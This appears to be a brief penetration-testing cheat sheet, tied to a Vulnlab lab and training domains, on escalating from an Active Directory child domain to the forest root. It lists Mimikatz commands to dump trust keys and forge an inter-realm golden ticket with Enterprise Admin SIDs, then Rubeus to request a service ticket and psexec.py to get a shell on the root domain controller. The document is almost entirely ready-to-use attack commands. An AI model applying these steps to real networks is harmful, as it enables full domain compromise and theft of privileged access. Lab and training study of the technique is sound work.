For the long version, refer to this article. Refer to Trusted (Vulnlab) for an example.

To get the domain SID:
lsadump::trust /patch
Then use the SID and rc4 hash:
kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:<DomainAdmin_SID> /sids:<Enterprise_Admin_SID> /rc4:<ticket hash> /service:krbtgt /target:moneycorp.local /ticket:<location to save the ticket>
Here dollarcorp.moneycorp.local is the child domain and moneycorp.local is the root domain; DomainAdmin_SID is marked [-512] and Enterprise_Admin_SID is marked [519].
Now use Rubeus to get a TGS:
Rubeus.exe asktgs /ticket:<ticket location> /service:cifs/mcorpdc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
Here /service is the service type and /dc is the domain controller.
Then, to get a shell:
psexec.py administrator@trusteddc.trusted.vl -k -no-pass